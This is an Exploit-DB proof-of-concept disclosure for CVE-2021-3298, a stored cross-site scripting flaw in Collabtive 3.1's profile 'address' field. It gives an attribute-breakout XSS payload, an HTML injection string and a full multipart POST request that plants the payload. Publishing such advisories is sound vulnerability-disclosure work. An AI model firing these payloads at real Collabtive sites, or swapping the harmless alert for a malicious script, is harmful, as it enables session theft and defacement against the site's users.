Collabtive 3.1 - 'address' Persistent Cross-Site Scripting

EDB-ID:

49468




Platform:

PHP

Date:

2021-01-25


# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
# CVE: CVE-2021-3298

==> Tutorial <==

1- Login to your account.
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
- You will see the executed HTML payload at there. (HTML Injection)
- You will see the executed XSS payload at profile edit section. (XSS)

==> Executed Payloads <==

XSS Payload   ==>   " onfocus="alert(1)" autofocus="
HTML Payload ==>   <h1>DehaBerkinBir</h1>

==> HTTP Request <==

POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1

-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"

dehaberkinbir@hotmail.com
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"

" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297

Content-Disposition: form-data; name="zip"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"

admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"


-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"


-----------------------------12097618915709137911841560297--